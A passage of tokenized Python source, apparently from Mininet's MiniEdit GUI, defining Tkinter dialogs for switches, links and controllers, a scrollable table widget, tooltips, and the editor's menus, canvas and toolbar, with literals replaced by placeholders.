) . grid ( row = <NUM_LIT:0> , sticky = E ) <EOL> self . b = Button ( self . rightfieldFrame , text = '<STR_LIT>' , command = self . addInterface ) <EOL> self . b . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> self . interfaceFrame = VerticalScrolledTable ( self . rightfieldFrame , rows = <NUM_LIT:0> , columns = <NUM_LIT:1> , title = '<STR_LIT>' ) <EOL> self . interfaceFrame . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' , columnspan = <NUM_LIT:2> ) <EOL> self . tableFrame = self . interfaceFrame . interior <EOL> for externalInterface in externalInterfaces : <EOL> self . tableFrame . addRow ( value = [ externalInterface ] ) <EOL> self . commandFrame = Frame ( self . rootFrame ) <EOL> self . commandFrame . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' , columnspan = <NUM_LIT:2> ) <EOL> self . commandFrame . columnconfigure ( <NUM_LIT:1> , weight = <NUM_LIT:1> ) <EOL> Label ( self . commandFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = W ) <EOL> self . startEntry = Entry ( self . commandFrame ) <EOL> self . startEntry . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> , sticky = '<STR_LIT>' ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . startEntry . insert ( <NUM_LIT:0> , str ( self . prefValues [ '<STR_LIT>' ] ) ) <EOL> Label ( self . commandFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = W ) <EOL> self . stopEntry = Entry ( self . commandFrame ) <EOL> self . stopEntry . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> , sticky = '<STR_LIT>' ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . stopEntry . insert ( <NUM_LIT:0> , str ( self . prefValues [ '<STR_LIT>' ] ) ) <EOL> def addInterface ( self ) : <EOL> self . tableFrame . addRow ( ) <EOL> def defaultDpid ( self , name ) : <EOL> "<STR_LIT>" <EOL> assert self <EOL> try : <EOL> dpid = int ( re . findall ( r'<STR_LIT>' , name ) [ <NUM_LIT:0> ] ) <EOL> dpid = hex ( dpid ) [ <NUM_LIT:2> : ] <EOL> return dpid <EOL> except IndexError : <EOL> return None <EOL> def apply ( self ) : <EOL> externalInterfaces = [ ] <EOL> for row in range ( self . tableFrame . rows ) : <EOL> if len ( self . tableFrame . get ( row , <NUM_LIT:0> ) ) > <NUM_LIT:0> : <EOL> externalInterfaces . append ( self . tableFrame . get ( row , <NUM_LIT:0> ) ) <EOL> dpid = self . dpidEntry . get ( ) <EOL> if ( self . defaultDpid ( self . hostnameEntry . get ( ) ) is None <EOL> and len ( dpid ) == <NUM_LIT:0> ) : <EOL> showerror ( title = "<STR_LIT>" , <EOL> message = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> results = { '<STR_LIT>' : externalInterfaces , <EOL> '<STR_LIT>' : self . hostnameEntry . get ( ) , <EOL> '<STR_LIT>' : dpid , <EOL> '<STR_LIT>' : self . startEntry . get ( ) , <EOL> '<STR_LIT>' : self . stopEntry . get ( ) , <EOL> '<STR_LIT>' : str ( self . sflow . get ( ) ) , <EOL> '<STR_LIT>' : str ( self . nflow . get ( ) ) , <EOL> '<STR_LIT>' : self . dpctlEntry . get ( ) , <EOL> '<STR_LIT>' : self . ipEntry . get ( ) } <EOL> sw = self . switchType . get ( ) <EOL> if sw == '<STR_LIT>' : <EOL> results [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if StrictVersion ( MININET_VERSION ) < StrictVersion ( '<STR_LIT>' ) : <EOL> self . ovsOk = False <EOL> showerror ( title = "<STR_LIT>" , <EOL> message = '<STR_LIT>' + VERSION + '<STR_LIT:.>' ) <EOL> elif sw == '<STR_LIT>' : <EOL> results [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> elif sw == '<STR_LIT>' : <EOL> results [ '<STR_LIT>' ] = '<STR_LIT:user>' <EOL> elif sw == '<STR_LIT>' : <EOL> results [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> else : <EOL> results [ '<STR_LIT>' ] = '<STR_LIT:default>' <EOL> self . result = results <EOL> class VerticalScrolledTable ( LabelFrame ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , parent , rows = <NUM_LIT:2> , columns = <NUM_LIT:2> , title = None , * args , ** kw ) : <EOL> LabelFrame . __init__ ( self , parent , text = title , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , * args , ** kw ) <EOL> vscrollbar = Scrollbar ( self , orient = VERTICAL ) <EOL> vscrollbar . pack ( fill = Y , side = RIGHT , expand = FALSE ) <EOL> canvas = Canvas ( self , bd = <NUM_LIT:0> , highlightthickness = <NUM_LIT:0> , <EOL> yscrollcommand = vscrollbar . set ) <EOL> canvas . pack ( side = LEFT , fill = BOTH , expand = TRUE ) <EOL> vscrollbar . config ( command = canvas . yview ) <EOL> canvas . xview_moveto ( <NUM_LIT:0> ) <EOL> canvas . yview_moveto ( <NUM_LIT:0> ) <EOL> self . interior = interior = TableFrame ( canvas , rows = rows , columns = columns ) <EOL> interior_id = canvas . create_window ( <NUM_LIT:0> , <NUM_LIT:0> , window = interior , <EOL> anchor = NW ) <EOL> def _configure_interior ( _event ) : <EOL> size = ( interior . winfo_reqwidth ( ) , interior . winfo_reqheight ( ) ) <EOL> canvas . config ( scrollregion = "<STR_LIT>" % size ) <EOL> if interior . winfo_reqwidth ( ) != canvas . winfo_width ( ) : <EOL> canvas . config ( width = interior . winfo_reqwidth ( ) ) <EOL> interior . bind ( '<STR_LIT>' , _configure_interior ) <EOL> def _configure_canvas ( _event ) : <EOL> if interior . winfo_reqwidth ( ) != canvas . winfo_width ( ) : <EOL> canvas . itemconfigure ( interior_id , width = canvas . winfo_width ( ) ) <EOL> canvas . bind ( '<STR_LIT>' , _configure_canvas ) <EOL> return <EOL> class TableFrame ( Frame ) : <EOL> def __init__ ( self , parent , rows = <NUM_LIT:2> , columns = <NUM_LIT:2> ) : <EOL> Frame . __init__ ( self , parent , background = "<STR_LIT>" ) <EOL> self . _widgets = [ ] <EOL> self . rows = rows <EOL> self . columns = columns <EOL> for row in range ( rows ) : <EOL> current_row = [ ] <EOL> for column in range ( columns ) : <EOL> label = Entry ( self , borderwidth = <NUM_LIT:0> ) <EOL> label . grid ( row = row , column = column , sticky = "<STR_LIT>" , padx = <NUM_LIT:1> , pady = <NUM_LIT:1> ) <EOL> current_row . append ( label ) <EOL> self . _widgets . append ( current_row ) <EOL> def set ( self , row , column , value ) : <EOL> widget = self . _widgets [ row ] [ column ] <EOL> widget . insert ( <NUM_LIT:0> , value ) <EOL> def get ( self , row , column ) : <EOL> widget = self . _widgets [ row ] [ column ] <EOL> return widget . get ( ) <EOL> def addRow ( self , value = None , readonly = False ) : <EOL> current_row = [ ] <EOL> for column in range ( self . columns ) : <EOL> label = Entry ( self , borderwidth = <NUM_LIT:0> ) <EOL> label . grid ( row = self . rows , column = column , sticky = "<STR_LIT>" , padx = <NUM_LIT:1> , pady = <NUM_LIT:1> ) <EOL> if value is not None : <EOL> label . insert ( <NUM_LIT:0> , value [ column ] ) <EOL> if readonly == True : <EOL> label . configure ( state = '<STR_LIT>' ) <EOL> current_row . append ( label ) <EOL> self . _widgets . append ( current_row ) <EOL> self . update_idletasks ( ) <EOL> self . rows += <NUM_LIT:1> <EOL> class LinkDialog ( tkSimpleDialog . Dialog ) : <EOL> def __init__ ( self , parent , title , linkDefaults ) : <EOL> self . linkValues = linkDefaults <EOL> tkSimpleDialog . Dialog . __init__ ( self , parent , title ) <EOL> def body ( self , master ) : <EOL> self . var = StringVar ( master ) <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , sticky = E ) <EOL> self . e1 = Entry ( master ) <EOL> self . e1 . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:2> , sticky = W ) <EOL> if '<STR_LIT>' in self . linkValues : <EOL> self . e1 . insert ( <NUM_LIT:0> , str ( self . linkValues [ '<STR_LIT>' ] ) ) <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:1> , sticky = E ) <EOL> self . e2 = Entry ( master ) <EOL> self . e2 . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . linkValues : <EOL> self . e2 . insert ( <NUM_LIT:0> , self . linkValues [ '<STR_LIT>' ] ) <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:2> , sticky = E ) <EOL> self . e3 = Entry ( master ) <EOL> self . e3 . grid ( row = <NUM_LIT:2> , column = <NUM_LIT:1> ) <EOL> Label ( master , text = "<STR_LIT:%>" ) . grid ( row = <NUM_LIT:2> , column = <NUM_LIT:2> , sticky = W ) <EOL> if '<STR_LIT>' in self . linkValues : <EOL> self . e3 . insert ( <NUM_LIT:0> , str ( self . linkValues [ '<STR_LIT>' ] ) ) <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:3> , sticky = E ) <EOL> self . e4 = Entry ( master ) <EOL> self . e4 . grid ( row = <NUM_LIT:3> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . linkValues : <EOL> self . e4 . insert ( <NUM_LIT:0> , str ( self . linkValues [ '<STR_LIT>' ] ) ) <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:4> , sticky = E ) <EOL> self . e5 = Entry ( master ) <EOL> self . e5 . grid ( row = <NUM_LIT:4> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . linkValues : <EOL> self . e5 . insert ( <NUM_LIT:0> , self . linkValues [ '<STR_LIT>' ] ) <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:5> , sticky = E ) <EOL> self . e6 = Entry ( master ) <EOL> self . e6 . grid ( row = <NUM_LIT:5> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . linkValues : <EOL> self . e6 . insert ( <NUM_LIT:0> , str ( self . linkValues [ '<STR_LIT>' ] ) ) <EOL> return self . e1 <EOL> def apply ( self ) : <EOL> self . result = { } <EOL> if len ( self . e1 . get ( ) ) > <NUM_LIT:0> : <EOL> self . result [ '<STR_LIT>' ] = int ( self . e1 . get ( ) ) <EOL> if len ( self . e2 . get ( ) ) > <NUM_LIT:0> : <EOL> self . result [ '<STR_LIT>' ] = self . e2 . get ( ) <EOL> if len ( self . e3 . get ( ) ) > <NUM_LIT:0> : <EOL> self . result [ '<STR_LIT>' ] = int ( self . e3 . get ( ) ) <EOL> if len ( self . e4 . get ( ) ) > <NUM_LIT:0> : <EOL> self . result [ '<STR_LIT>' ] = int ( self . e4 . get ( ) ) <EOL> if len ( self . e5 . get ( ) ) > <NUM_LIT:0> : <EOL> self . result [ '<STR_LIT>' ] = self . e5 . get ( ) <EOL> if len ( self . e6 . get ( ) ) > <NUM_LIT:0> : <EOL> self . result [ '<STR_LIT>' ] = int ( self . e6 . get ( ) ) <EOL> class ControllerDialog ( tkSimpleDialog . Dialog ) : <EOL> def __init__ ( self , parent , title , ctrlrDefaults = None ) : <EOL> if ctrlrDefaults : <EOL> self . ctrlrValues = ctrlrDefaults <EOL> tkSimpleDialog . Dialog . __init__ ( self , parent , title ) <EOL> def body ( self , master ) : <EOL> self . var = StringVar ( master ) <EOL> self . protcolvar = StringVar ( master ) <EOL> rowCount = <NUM_LIT:0> <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> self . hostnameEntry = Entry ( master ) <EOL> self . hostnameEntry . grid ( row = rowCount , column = <NUM_LIT:1> ) <EOL> self . hostnameEntry . insert ( <NUM_LIT:0> , self . ctrlrValues [ '<STR_LIT>' ] ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> self . e2 = Entry ( master ) <EOL> self . e2 . grid ( row = rowCount , column = <NUM_LIT:1> ) <EOL> self . e2 . insert ( <NUM_LIT:0> , self . ctrlrValues [ '<STR_LIT>' ] ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> controllerType = self . ctrlrValues [ '<STR_LIT>' ] <EOL> self . o1 = OptionMenu ( master , self . var , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . o1 . grid ( row = rowCount , column = <NUM_LIT:1> , sticky = W ) <EOL> if controllerType == '<STR_LIT>' : <EOL> self . var . set ( "<STR_LIT>" ) <EOL> elif controllerType == '<STR_LIT>' : <EOL> self . var . set ( "<STR_LIT>" ) <EOL> elif controllerType == '<STR_LIT>' : <EOL> self . var . set ( "<STR_LIT>" ) <EOL> else : <EOL> self . var . set ( "<STR_LIT>" ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> if '<STR_LIT>' in self . ctrlrValues : <EOL> controllerProtocol = self . ctrlrValues [ '<STR_LIT>' ] <EOL> else : <EOL> controllerProtocol = '<STR_LIT>' <EOL> self . protcol = OptionMenu ( master , self . protcolvar , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . protcol . grid ( row = rowCount , column = <NUM_LIT:1> , sticky = W ) <EOL> if controllerProtocol == '<STR_LIT>' : <EOL> self . protcolvar . set ( "<STR_LIT>" ) <EOL> else : <EOL> self . protcolvar . set ( "<STR_LIT>" ) <EOL> rowCount += <NUM_LIT:1> <EOL> remoteFrame = LabelFrame ( master , text = '<STR_LIT>' , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> remoteFrame . grid ( row = rowCount , column = <NUM_LIT:0> , columnspan = <NUM_LIT:2> , sticky = W ) <EOL> Label ( remoteFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , sticky = E ) <EOL> self . e1 = Entry ( remoteFrame ) <EOL> self . e1 . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> self . e1 . insert ( <NUM_LIT:0> , self . ctrlrValues [ '<STR_LIT>' ] ) <EOL> rowCount += <NUM_LIT:1> <EOL> return self . hostnameEntry <EOL> def apply ( self ) : <EOL> self . result = { '<STR_LIT>' : self . hostnameEntry . get ( ) , <EOL> '<STR_LIT>' : self . e1 . get ( ) , <EOL> '<STR_LIT>' : int ( self . e2 . get ( ) ) } <EOL> controllerType = self . var . get ( ) <EOL> if controllerType == '<STR_LIT>' : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> elif controllerType == '<STR_LIT>' : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> elif controllerType == '<STR_LIT>' : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> else : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> controllerProtocol = self . protcolvar . get ( ) <EOL> if controllerProtocol == '<STR_LIT>' : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> else : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> class ToolTip ( object ) : <EOL> def __init__ ( self , widget ) : <EOL> self . widget = widget <EOL> self . tipwindow = None <EOL> self . id = None <EOL> self . x = self . y = <NUM_LIT:0> <EOL> def showtip ( self , text ) : <EOL> "<STR_LIT>" <EOL> self . text = text <EOL> if self . tipwindow or not self . text : <EOL> return <EOL> x , y , _cx , cy = self . widget . bbox ( "<STR_LIT>" ) <EOL> x = x + self . widget . winfo_rootx ( ) + <NUM_LIT> <EOL> y = y + cy + self . widget . winfo_rooty ( ) + <NUM_LIT> <EOL> self . tipwindow = tw = Toplevel ( self . widget ) <EOL> tw . wm_overrideredirect ( <NUM_LIT:1> ) <EOL> tw . wm_geometry ( "<STR_LIT>" % ( x , y ) ) <EOL> try : <EOL> tw . tk . call ( "<STR_LIT>" , <EOL> "<STR_LIT>" , tw . _w , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> except TclError : <EOL> pass <EOL> label = Label ( tw , text = self . text , justify = LEFT , <EOL> background = "<STR_LIT>" , relief = SOLID , borderwidth = <NUM_LIT:1> , <EOL> font = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> label . pack ( ipadx = <NUM_LIT:1> ) <EOL> def hidetip ( self ) : <EOL> tw = self . tipwindow <EOL> self . tipwindow = None <EOL> if tw : <EOL> tw . destroy ( ) <EOL> class MiniEdit ( Frame ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , parent = None , cheight = <NUM_LIT> , cwidth = <NUM_LIT:1000> ) : <EOL> self . defaultIpBase = '<STR_LIT>' <EOL> self . nflowDefaults = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' } <EOL> self . sflowDefaults = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . appPrefs = { <EOL> "<STR_LIT>" : self . defaultIpBase , <EOL> "<STR_LIT>" : "<STR_LIT:0>" , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . sflowDefaults , <EOL> '<STR_LIT>' : self . nflowDefaults , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' } <EOL> } <EOL> Frame . __init__ ( self , parent ) <EOL> self . action = None <EOL> self . appName = '<STR_LIT>' <EOL> self . fixedFont = tkFont . Font ( family = "<STR_LIT>" , size = "<STR_LIT>" ) <EOL> self . font = ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> self . smallFont = ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> self . bg = '<STR_LIT>' <EOL> self . top = self . winfo_toplevel ( ) <EOL> self . top . title ( self . appName ) <EOL> self . createMenubar ( ) <EOL> self . cheight , self . cwidth = cheight , cwidth <EOL> self . cframe , self . canvas = self . createCanvas ( ) <EOL> self . controllers = { } <EOL> self . images = miniEditImages ( ) <EOL> self . buttons = { } <EOL> self . active = None <EOL> self . tools = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . customColors = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> self . toolbar = self . createToolbar ( ) <EOL> self . toolbar . grid ( column = <NUM_LIT:0> , row = <NUM_LIT:0> , sticky = '<STR_LIT>' ) <EOL> self . cframe . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:0> ) <EOL> self . columnconfigure ( <NUM_LIT:1> , weight = <NUM_LIT:1> ) <EOL> self . rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> self . pack ( expand = True , fill = '<STR_LIT>' ) <EOL> self . aboutBox = None <EOL> self . nodeBindings = self . createNodeBindings ( ) <EOL> self . nodePrefixes = { '<STR_LIT>' : '<STR_LIT:r>' , '<STR_LIT>' : '<STR_LIT:s>' , '<STR_LIT>' : '<STR_LIT:s>' , '<STR_LIT>' : '<STR_LIT:h>' , '<STR_LIT>' : '<STR_LIT:c>' } <EOL> self . widgetToItem = { } <EOL> self . itemToWidget = { } <EOL> self . link = self . linkWidget = None <EOL> self . selection = None <EOL> self . bind ( '<STR_LIT>' , lambda event : self . quit ( ) ) <EOL> self . bind ( '<STR_LIT>' , self . deleteSelection ) <EOL> self . bind ( '<STR_LIT>' , self . deleteSelection ) <EOL> self . focus ( ) <EOL> self . hostPopup = Menu ( self . top , tearoff = <NUM_LIT:0> ) <EOL> self . hostPopup . add_command ( label = '<STR_LIT>' , font = self . font ) <EOL> self . hostPopup . add_separator ( ) <EOL> self . hostPopup . add_command ( label = '<STR_LIT>' , font = self . font , command = self . hostDetails ) <EOL> self . hostRunPopup = Menu ( self . top , tearoff = <NUM_LIT:0> ) <EOL> self . hostRunPopup . add_command ( label = '<STR_LIT>' , font = self . font ) <EOL> self . hostRunPopup . add_separator ( ) <EOL> self . hostRunPopup . add_command ( label = '<STR_LIT>' , font = self . font , command = self . xterm ) <EOL> self . legacyRouterRunPopup = Menu ( self . top , tearoff = <NUM_LIT:0> ) <EOL> self . legacyRouterRunPopup . add_command ( label = '<STR_LIT>' , font = self . font ) <EOL> self . legacyRouterRunPopup . add_separator ( ) <EOL> self . legacyRouterRunPopup . add_command ( label = '<STR_LIT>' , font = self . font , command = self . xterm ) <EOL> self . switchPopup = Menu ( self . top , tearoff = <NUM_LIT:0> ) <EOL> self . switchPopup . add_command ( label = '<STR_LIT>' , font = self . font ) <EOL> self . switchPopup . add_separator ( ) <EOL> self . switchPopup . add_command ( label = '<STR_LIT>' , font = self . font , command = self . switchDetails ) <EOL> self . switchRunPopup = Menu ( self . top , tearoff = <NUM_LIT:0> ) <EOL> self . switchRunPopup . add_command ( label = '<STR_LIT>' , font = self . font ) <EOL> self . switchRunPopup . add_separator ( ) <EOL> self . switchRunPopup . add_command ( label = '<STR_LIT>' , font = self . font , command = self . listBridge ) <EOL> self . linkPopup = Menu ( self . top , tearoff = <NUM_LIT:0> ) <EOL> self . linkPopup . add_command ( label = '<STR_LIT>' , font = self . font ) <EOL> self . linkPopup . add_separator ( ) <EOL> self . linkPopup . add_command ( label = '<STR_LIT>' , font = self . font , command = self . linkDetails ) <EOL> self . linkRunPopup = Menu ( self . top , tearoff = <NUM_LIT:0> ) <EOL> self . linkRunPopup . add_command ( label = '<STR_LIT>' , font = self . font ) <EOL> self . linkRunPopup . add_separator ( ) <EOL> self . linkRunPopup . add_command ( label = '<STR_LIT>' , font = self . font , command = self . linkUp ) <EOL> self . linkRunPopup . add_command ( label = '<STR_LIT>' , font = self . font , command = self . linkDown ) <EOL> self . controllerPopup = Menu ( self . top , tearoff = <NUM_LIT:0> ) <EOL> self . controllerPopup . add_command ( label = '<STR_LIT>' , font = self . font ) <EOL> self . controllerPopup . add_separator ( ) <EOL> self . controllerPopup . add_command ( label = '<STR_LIT>' , font = self . font , command = self . controllerDetails ) <EOL> self . linkx = self . linky = self . linkItem = None <EOL> self . lastSelection = None <EOL> self . links = { } <EOL> self . hostOpts = { } <EOL> self . switchOpts = { } <EOL> self . hostCount = <NUM_LIT:0> <EOL> self . switchCount = <NUM_LIT:0> <EOL> self . controllerCount = <NUM_LIT:0> <EOL> self . net = None <EOL> Wm . wm_protocol ( self . top , name = '<STR_LIT>' , func = self . quit ) <EOL> def quit ( self ) : <EOL> "<STR_LIT>" <EOL> self . stop ( ) <EOL> Frame . quit ( self ) <EOL> def createMenubar ( self ) : <EOL> "<STR_LIT>" <EOL> font = self . font <EOL> mbar = Menu ( self . top , font = font ) <EOL> self . top . configure ( menu = mbar ) <EOL> fileMenu = Menu ( mbar , tearoff = False ) <EOL> mbar . add_cascade ( label = "<STR_LIT>" , font = font , menu = fileMenu ) <EOL> fileMenu . add_command ( label = "<STR_LIT>" , font = font , command = self . newTopology ) <EOL> fileMenu . add_command ( label = "<STR_LIT>" , font = font , command = self . loadTopology ) <EOL> fileMenu . add_command ( label = "<STR_LIT>" , font = font , command = self . saveTopology ) <EOL> fileMenu . add_command ( label = "<STR_LIT>" , font = font , command = self . exportScript ) <EOL> fileMenu . add_separator ( ) <EOL> fileMenu . add_command ( label = '<STR_LIT>' , command = self . quit , font = font ) <EOL> editMenu = Menu ( mbar , tearoff = False ) <EOL> mbar . add_cascade ( label = "<STR_LIT>" , font = font , menu = editMenu ) <EOL> editMenu . add_command ( label = "<STR_LIT>" , font = font , <EOL> command = lambda : self . deleteSelection ( None ) ) <EOL> editMenu . add_command ( label = "<STR_LIT>" , font = font , command = self . prefDetails ) <EOL> runMenu = Menu ( mbar , tearoff = False ) <EOL> mbar . add_cascade ( label = "<STR_LIT>" , font = font , menu = runMenu ) <EOL> runMenu . add_command ( label = "<STR_LIT>" , font = font , command = self . doRun ) <EOL> runMenu . add_command ( label = "<STR_LIT>" , font = font , command = self . doStop ) <EOL> fileMenu . add_separator ( ) <EOL> runMenu . add_command ( label = '<STR_LIT>' , font = font , command = self . ovsShow ) <EOL> runMenu . add_command ( label = '<STR_LIT>' , font = font , command = self . rootTerminal ) <EOL> appMenu = Menu ( mbar , tearoff = False ) <EOL> mbar . add_cascade ( label = "<STR_LIT>" , font = font , menu = appMenu ) <EOL> appMenu . add_command ( label = '<STR_LIT>' , command = self . about , <EOL> font = font ) <EOL> def createCanvas ( self ) : <EOL> "<STR_LIT>" <EOL> f = Frame ( self ) <EOL> canvas = Canvas ( f , width = self . cwidth , height = self . cheight , <EOL> bg = self . bg ) <EOL> xbar = Scrollbar ( f , orient = '<STR_LIT>' , command = canvas . xview ) <EOL> ybar = Scrollbar ( f , orient = '<STR_LIT>' , command = canvas . yview ) <EOL> canvas . configure ( xscrollcommand = xbar . set , yscrollcommand = ybar . set ) <EOL> resize = Label ( f , bg = '<STR_LIT>' ) <EOL> canvas . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> , sticky = '<STR_LIT>' ) <EOL> ybar . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:2> , sticky = '<STR_LIT>' ) <EOL> xbar . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> , sticky = '<STR_LIT>' ) <EOL> resize . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:2> , sticky = '<STR_LIT>' ) <EOL> f . rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> f . columnconfigure ( <NUM_LIT:1> , weight = <NUM_LIT:1> ) <EOL> f . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' ) <EOL> f . bind ( '<STR_LIT>' , lambda event : self . updateScrollRegion ( ) ) <EOL> canvas . bind ( '<STR_LIT>' , self . clickCanvas ) <EOL> canvas . bind ( '<STR_LIT>' , self . dragCanvas ) <EOL> canvas . bind ( '<STR_LIT>' , self . releaseCanvas ) <EOL> return f , canvas <EOL> def updateScrollRegion ( self ) : <EOL> "<STR_LIT>" <EOL> bbox = self . canvas . bbox ( '<STR_LIT:all>' ) <EOL> if bbox is not None : <EOL> self . canvas . configure ( scrollregion = ( <NUM_LIT:0> , <NUM_LIT:0> , bbox [ <NUM_LIT:2> ] , <EOL> bbox [ <NUM_LIT:3> ] ) ) <EOL> def canvasx ( self , x_root ) : <EOL> "<STR_LIT>" <EOL> c = self . canvas <EOL> return c . canvasx ( x_root ) - c . winfo_rootx ( ) <EOL> def canvasy ( self , y_root ) : <EOL> "<STR_LIT>" <EOL> c = self . canvas <EOL> return c . canvasy ( y_root ) - c . winfo_rooty ( ) <EOL> def activate ( self , toolName ) : <EOL> "<STR_LIT>" <EOL> if self . active : <EOL> self . buttons [ self . active ] . configure ( relief = '<STR_LIT>' ) <EOL> self . buttons [ toolName ] . configure ( relief = '<STR_LIT>' ) <EOL> self . active = toolName <EOL> @ staticmethod <EOL> def createToolTip ( widget , text ) : <EOL> toolTip = ToolTip ( widget ) <EOL> def enter ( _event ) : <EOL> toolTip . showtip ( text ) <EOL> def leave ( _event ) : <EOL> toolTip . hidetip ( ) <EOL> widget . bind ( '<STR_LIT>' , enter ) <EOL> widget . bind ( '<STR_LIT>' , leave ) <EOL> def createToolbar ( self ) : <EOL> "<STR_LIT>" <EOL> toolbar = Frame ( self ) <EOL> for tool in self . tools : <EOL> cmd = ( lambda t = tool : self . activate ( t ) ) <EOL> b = Button ( toolbar , text = tool , font = self . smallFont , command = cmd ) <EOL> if tool in self . images : <EOL> b . config ( height = <NUM_LIT> , image = self . images [ tool ] ) <EOL> self . createToolTip ( b , str ( tool ) ) <EOL> b . pack ( fill = '<STR_LIT:x>' ) <EOL> self . buttons [ tool ] = b <EOL> self . activate ( self . tools [ <NUM_LIT:0> ] ) <EOL> Label ( toolbar , text = '<STR_LIT>' ) . pack ( ) <EOL> for cmd , color in [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] : <EOL> doCmd = getattr ( self , '<STR_LIT>' + cmd ) <EOL> b = Button ( toolbar , text = cmd , font = self . smallFont , <EOL> fg = color , command = doCmd ) <EOL> b . pack ( fill = '<STR_LIT:x>' , side = '<STR_LIT>' ) <EOL> return toolbar <EOL> def doRun ( self ) : <EOL> "<STR_LIT>" <EOL> self . activate ( '<STR_LIT>' ) <EOL> for tool in self . tools : <EOL> self . buttons [ tool ] . config ( state = '<STR_LIT>' ) <EOL> self . start ( ) <EOL> def doStop ( self ) : <EOL> "<STR_LIT>" <EOL> self . stop ( ) <EOL> for tool in self . tools : <EOL> self . buttons [ tool ] . config ( state = '<STR_LIT>' ) <EOL> def addNode ( self , node , nodeNum , x , y , name = None ) : <EOL> "<STR_LIT>" <EOL> if '<STR_LIT>' == node : <EOL> self . switchCount += <NUM_LIT:1> <EOL> if '<STR_LIT>' == node : <EOL> self . hostCount += <NUM_LIT:1> <EOL> if '<STR_LIT>' == node : <EOL> self . controllerCount += <NUM_LIT:1> <EOL> if name is None : <EOL> name = self . 